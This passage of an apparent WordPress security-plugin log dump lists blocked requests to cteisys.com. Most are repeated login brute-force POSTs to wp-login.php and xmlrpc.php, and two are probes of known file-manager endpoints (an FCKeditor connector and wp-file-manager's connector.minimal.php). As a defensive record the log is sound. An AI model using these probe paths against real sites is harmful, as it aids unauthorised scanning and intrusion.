10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','IxCYLT6WyQGb57nJjqlNiarh',0,1664047728.2822,1193,'','POST',403,0,515,0,1,'',0),('209.141.57.9',3515693321,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','69X4xfEavsFb3HZiNRCU0BVO',0,1664048119.6071,623,'','POST',403,0,600,0,1,'',0),('124.158.12.149',2090732693,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JnlUwfd5K14NTsELQBOo7rD3',0,1664048182.7211,1332,'','POST',403,0,515,0,1,'',0),('13.79.17.158',223285662,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','4IEjnhCK9ygliuMpFxc8BvAO',0,1664048467.1121,2255,'','POST',403,0,600,0,1,'',0),('51.38.80.81',858148945,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','g1Hv5J08iabWS2ecdUfw9tXk',0,1664048471.7447,1286,'','POST',403,0,515,0,1,'',0),('82.165.18.75',1386549835,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','IG7W9dzMguFQcHihotZwpyPU',0,1664048657.9588,1176,'','POST',403,0,515,0,1,'',0),('194.163.159.35',3265503011,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','zWEgxdsDc1Cint3TBPhAubQ7',0,1664049142.5215,7402,'','POST',403,0,515,0,1,'',0),('120.27.240.230',2015097062,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','OTaWosymv8NCpISJE7PhQRcG',0,1664049251.6782,1324,'','POST',403,0,600,0,1,'',0),('192.210.196.65',3235038273,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','npMYLd78toZlAsgBCbDHUy6N',0,1664049620.9527,1782,'','POST',403,0,515,0,1,'',0),('150.95.24.78',2522814542,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','KbqMvhk0epjc1nZ25xiyLXWH',0,1664049914.6874,18890,'','POST',403,0,515,0,1,'',0),('72.167.34.14',1218912782,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','RwSgeqNlF6Wo1EcB8kCdzXix',0,1664049968.6406,1403,'','POST',403,0,600,0,1,'',0),('50.87.216.226',844617954,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','9H3Im7ui8UTMGpzo4gKVNdfR',0,1664050130.7851,1314,'','POST',403,0,515,0,1,'',0),('2.184.67.138',45630346,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','srlcKy7J8BWLzRXEtPFIo52n',0,1664050456.2766,1645,'','POST',403,0,515,0,1,'',0),('213.165.237.48',3584421168,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qb7tu6U8MIpvS9O1PJLzl50y',0,1664050635.0779,1424,'','POST',403,0,515,0,1,'',0),('45.120.69.121',762856825,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','TkmG6Pz50h7sZEDKvJ8f1t9c',0,1664050778.2909,632,'','POST',403,0,600,0,1,'',0),('190.145.68.131',3197191299,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','po97Olv6FreIjQ1VCtNsBZmi',0,1664051143.5361,1581,'','POST',403,0,515,0,1,'',0),('91.201.215.19',1539954451,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','uWqcQmRF36gkNMXEajTA40bd',0,1664051476.0904,1957,'','POST',403,0,515,0,1,'',0),('141.94.247.170',2371811242,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','Ces1aMXdGSRc7jvgJN823P0f',0,1664051506.2908,1251,'','POST',403,0,600,0,1,'',0),('103.154.177.165',1738191269,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Ooet0KTxbuzvWkw5P3ns4HiG',0,1664051657.5703,9178,'','POST',403,0,515,0,1,'',0),('185.165.118.130',3114628738,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dTIvNB1Dr2mQUoc9EJ5znXhK',0,1664052211.6745,1234,'','POST',403,0,515,0,1,'',0),('54.38.73.235',908478955,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/59.0.3071.115 Safari\\/537.36\"}','nK5WmwGDjHBc8b7lSpMCJQEZ',0,1664052313.9205,1331,'','POST',403,0,600,0,1,'',0),('124.217.226.56',2094654008,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HDU6PjWu0dyM5zrlkaLhAfc3',0,1664052499.2710,1247,'','POST',403,0,515,0,1,'',0),('69.163.224.107',1168367723,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','HSyWqiOZAwzfh8cTKBjUFpr5',0,1664053036.2351,2191,'','POST',403,0,600,0,1,'',0),('107.180.247.212',1807022036,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZsunqImcCf2d6iHWU75a8R3E',0,1664053053.9399,511,'','POST',403,0,515,0,1,'',0),('39.107.137.177',661359025,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','hAxJrBXugDiwaGCtIvl7Z6Sy',0,1664053826.6019,10210,'','POST',403,0,515,0,1,'',0),('51.38.192.91',858177627,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','84p9MfzZh7wXKPgrcBl2NJub',0,1664053840.0250,502,'','POST',403,0,600,0,1,'',0),('190.92.159.48',3193741104,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','c2v3NEkdrhaDpXsHQqWRBotO',0,1664054142.6022,1215,'','POST',403,0,515,0,1,'',0),('165.22.194.243',2769732339,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','E2o4bPi83UeNh7kIaWGTVXBY',0,1664054353.5906,1432,'','POST',403,0,515,0,1,'',0),('167.71.141.164',2806484388,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','UClHNy2ExP95uBKc0MhGeotf',0,1664054565.6470,1353,'','POST',403,0,600,0,1,'',0),('130.61.143.194',2185072578,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','08XWvwBilbFy1oPsxNn7IzeM',0,1664054919.7993,1255,'','POST',403,0,515,0,1,'',0),('35.213.170.208',601205456,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','uosYSOCrfRdgKPGIyFNA5mnq',0,1664055235.3902,1284,'','POST',403,0,515,0,1,'',0),('208.113.171.103',3497110375,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','85pdmnJFb6xoz2Q7rsw0Ai4Y',0,1664055372.6714,1171,'','POST',403,0,600,0,1,'',0),('103.166.182.177',1738978993,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dwZ1sgYGHIByqW8R0MO5Cxol',0,1664055462.0542,1172,'','POST',403,0,515,0,1,'',0),('185.197.195.173',3116745645,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','d2WzCPitNkph4ylATRJY50Ef',0,1664055815.3999,1556,'','POST',403,0,515,0,1,'',0),('185.197.195.173',3116745645,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ORUlcx4vpS9J32YDwj6Ih7yb',0,1664056049.9762,1481,'','POST',403,0,515,0,1,'',0),('88.212.236.252',1490349308,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','Nk9Syt6hosTG8LD0K5jPdXxi',0,1664056098.3350,1264,'','POST',403,0,600,0,1,'',0),('213.152.186.19',3583556115,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','kM5HxZEumDWzROUv6SVAiqno',0,1664056483.2953,18288,'','POST',403,0,515,0,1,'',0),('190.145.68.131',3197191299,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8XwAjfLc2D5auqSUYg9oe0JW',0,1664056637.1320,1353,'','POST',403,0,515,0,1,'',0),('51.195.148.190',868455614,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','ockP4LVHCQaq0luxEh9vrIs3',0,1664056906.6212,1386,'','POST',403,0,600,0,1,'',0),('13.76.135.117',223119221,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wbIUBxLTmZtcA97znhS4Ks8G',0,1664056977.6957,1295,'','POST',403,0,515,0,1,'',0),('208.109.39.235',3496814571,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3sQPNUjq9tBvxDom6S8A0zga',0,1664057223.2293,1292,'','POST',403,0,515,0,1,'',0),('171.244.17.110',2884899182,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','gSNHAz5Y9CJPBqRXcDv4GK0n',0,1664057578.1164,1352,'','POST',403,0,515,0,1,'',0),('178.217.190.82',3000614482,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','AXEH6VOgqimlL4ZMjSdQPRNs',0,1664057636.0598,1242,'','POST',403,0,600,0,1,'',0),('122.17.148.164',2047972516,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','uX3UH4esD1TqQz5Zrmwfl8nM',0,1664057820.9759,1220,'','POST',403,0,515,0,1,'',0),('15.235.168.187',267102395,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','L0Wdl3xIkgZapfUvCiGnVSDA',0,1664058193.2695,1209,'','POST',403,0,515,0,1,'',0),('178.128.104.173',2994759853,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rFwQ3kZLPBJIXnGDtfcd8joO',0,1664058422.6246,1230,'','POST',403,0,515,0,1,'',0),('147.182.249.22',2478242070,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','iHjUqvGAtMayDEhVKP8SNrOF',0,1664058441.2368,477,'','POST',403,0,600,0,1,'',0),('150.230.247.143',2531719055,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','o5nS4UxEK1LwX3Oyk6W7NAZb',0,1664058801.9121,1244,'','POST',403,0,515,0,1,'',0),('51.178.136.33',867338273,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VYhrHzsGD8eK6LlkAFXdSypQ',0,1664059029.7079,1231,'','POST',403,0,515,0,1,'',0),('51.38.192.91',858177627,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','njVaOT4gxlsQZNWcim7koBz2',0,1664059162.1586,1182,'','POST',403,0,600,0,1,'',0),('184.75.223.211',3091980243,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','f1saSJ9GXOWcCVPMKtZvmbud',0,1664059749.2043,14183,'','POST',403,0,515,0,1,'',0),('51.15.183.168',856668072,'','http://cteisys.com/js/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/75.0.3770.100 Safari\\/537.36\"}','JkWm0QiovPI3CzwtAcbqnZKe',0,1664059830.2349,283,'','GET',403,0,700,0,1,'',0),('23.99.229.218',392422874,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','D9iWZ7lheqRTQIn1pHmowxOX',0,1664059969.7695,1197,'','POST',403,0,600,0,1,'',0),('51.79.144.41',860852265,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','N4SAqkHgVLEpFBoayu1P0Wi5',0,1664059999.8695,1406,'','POST',403,0,515,0,1,'',0),('13.76.135.117',223119221,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','kodiu3fKe0smUPahAL2BE71S',0,1664060232.9601,1219,'','POST',403,0,515,0,1,'',0),('133.130.103.36',2239915812,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','IvOCuiK6ngwGe1qQFZDsrdcH',0,1664060697.1520,1332,'','POST',403,0,600,0,1,'',0),('192.210.196.65',3235038273,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8Dpj3JTlaRzGiBqWekrgImt7',0,1664060857.3466,1321,'','POST',403,0,515,0,1,'',0),('184.75.223.203',3091980235,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','36EqTCcIgk0ydWoKM78XpxOZ',0,1664061193.2028,495,'','POST',403,0,515,0,1,'',0),('67.23.254.254',1125646078,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','250ZCgl6N4YvRckWbiEaQh9r',0,1664061220.6657,547,'','POST',403,0,515,0,1,'',0),('162.0.216.181',2717964469,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5GxEkMHLVR732trmqNTDK4Xz',0,1664061460.2907,5616,'','POST',403,0,515,0,1,'',0),('103.129.222.91',1736564315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','Gmkbn8Csag2hfLrp7DUXVylS',0,1664061506.9643,1539,'','POST',403,0,600,0,1,'',0),('185.46.121.66',3106830658,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','6L5EZS1cax74r0bqQ98DhiIU',0,1664061840.3416,1403,'','POST',403,0,515,0,1,'',0),('196.44.176.39',3291263015,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','IC6AZlsT9b0OK3izPyck5jvh',0,1664062076.2851,1172,'','POST',403,0,515,0,1,'',0),('47.115.24.165',796072101,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/59.0.3071.115 Safari\\/537.36\"}','QGiAlpL0XsTyx9rwhPYFjDS5',0,1664062231.5783,1249,'','POST',403,0,600,0,1,'',0),('101.0.73.142',1694517646,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wD4vEhWQuIsizRG0TbHV8Lx1',0,1664062697.1919,1261,'','POST',403,0,515,0,1,'',0),('34.75.65.218',575357402,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','LtTU78vI32uYWspdBF4RzGky',0,1664063037.7037,1199,'','POST',403,0,600,0,1,'',0),('190.107.177.243',3194728947,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ShmcPV6pv94ewgDWaMNyCRnL',0,1664063061.7061,466,'','POST',403,0,515,0,1,'',0),('192.64.113.147',3225448851,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HwaYi2yjfCv57uBPDGMgelnI',0,1664063328.2140,1506,'','POST',403,0,515,0,1,'',0),('147.78.47.249',2471374841,'','http://cteisys.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/105.0.0.0 Safari\\/537.36\"}','PDx8S7buf5Wl0FQ9mr2pByTX',0,1664063664.1905,291,'','GET',403,0,700,0,1,'',0),('202.21.38.119',3390383735,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','VuDILypJxqGXWKYNo3ASCE21',0,1664063763.3587,1119,'','POST',403,0,600,0,1,'',0),('139.59.118.238',2335930094,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','aAZcseQfztpx9S8mGuWYEqik',0,1664064578.2744,1298,'','POST',403,0,600,0,1,'',0),('106.14.141.22',1779338518,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','0YlQxRwoTgu7B5IimynOSzc3',0,1664064584.6051,513,'','POST',403,0,515,0,1,'',0),('47.57.186.73',792312393,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','nis1uZ9lYXUdB7Iv0ytFAKHC',0,1664064952.1577,18546,'','POST',403,0,515,0,1,'',0),('149.56.26.54',2503481910,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','XW3CEgjSLJO5mD0hqrxnFBfw',0,1664065307.7920,1853,'','POST',403,0,600,0,1,'',0),('165.232.183.66',2783491906,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5i2MHuy3C1OBNrKondltjgvQ',0,1664065590.2415,18449,'','POST',403,0,515,0,1,'',0),('192.163.194.31',3231957535,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','cYX0C75h8FODIRisSMakbpQj',0,1664065842.9024,1299,'','POST',403,0,515,0,1,'',0),('188.166.183.39',3165042471,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','q2tnQgETs6wUYSLa4B9cVfZX',0,1664066123.6302,1665,'','POST',403,0,600,0,1,'',0),('193.107.158.16',3245055504,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','aRi6BhO4GrzPY8Zme1V2Akvn',0,1664066219.9526,1437,'','POST',403,0,515,0,1,'',0),('171.244.17.110',2884899182,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2yeY4lIJgzvAjoVwWcHa5CPR',0,1664066479.1336,1345,'','POST',403,0,515,0,1,'',0),('35.187.58.136',599472776,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','XcMCv9QVhlJD1pm5YRzSr3sy',0,1664066853.4199,1644,'','POST',403,0,600,0,1,'',0),('154.0.165.146',2583733650,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VWuhxN3ZXpRiY85DeIdKfHO0',0,1664067117.4483,10105,'','POST',403,0,515,0,1,'',0),('97.79.239.127',1632628607,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','vqQZxEkYsJ50p1iOWCP2Ae3a',0,1664067500.4258,1230,'','POST',403,0,515,0,1,'',0),('159.203.120.246',2680912118,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','3uEjOTQK61NJYroBdGXxR9Li',0,1664067664.4900,2272,'','POST',403,0,600,0,1,'',0),('111.90.145.188',1868206524,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','EhlsoTpVN68CeB9UQOiHdgar',0,1664067753.3986,1283,'','POST',403,0,515,0,1,'',0),('41.93.82.7',693981703,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','6Wk1AQ2Yvwtanl8jJ9pPmTF7',0,1664068149.1303,18840,'','POST',403,0,515,0,1,'',0),('68.183.86.247',1152866039,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','1uURvTj6VtNnGsZpc357Abgd',0,1664068407.3086,1400,'','POST',403,0,600,0,1,'',0),('80.251.219.111',1358682991,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','LrKNwlpEISU2gFTe5J187kvo',0,1664068415.2108,729,'','POST',403,0,515,0,1,'',0),('114.132.201.19',1921304851,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','PmU1pqND0wFlOc2gnR5BiACs',0,1664068775.8096,1450,'','POST',403,0,515,0,1,'',0),('162.240.211.236',2733691884,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Pox9rYNaJpR4TD2kIig7Gh3t',0,1664069052.4379,1689,'','POST',403,0,515,0,1,'',0),('110.40.244.196',1848177860,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 